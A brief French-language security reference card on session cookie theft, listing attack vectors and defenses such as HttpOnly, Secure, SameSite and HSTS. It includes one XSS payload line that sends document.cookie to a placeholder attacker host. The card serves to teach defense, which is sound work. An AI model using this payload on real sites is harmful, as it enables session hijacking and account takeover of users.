Cookie Theft — Vol de cookies de session
★★★★★
Vecteurs de vol
Le vol de cookie de session permet de se faire passer pour la victime sans son mot de passe. Vecteurs : XSS, MITM sur connexion non chiffrée, malware, extensions malveillantes.
<script>fetch("https://attacker.com/?c="+document.cookie)</script>
# Si HttpOnly actif, document.cookie ne montre pas ce cookie
# mais les requêtes l envoient quand même (CSRF possible) Défenses
Cookie flags : HttpOnly + Secure + SameSite=Strict · HTTPS partout avec HSTS · Rotation régulière des tokens de session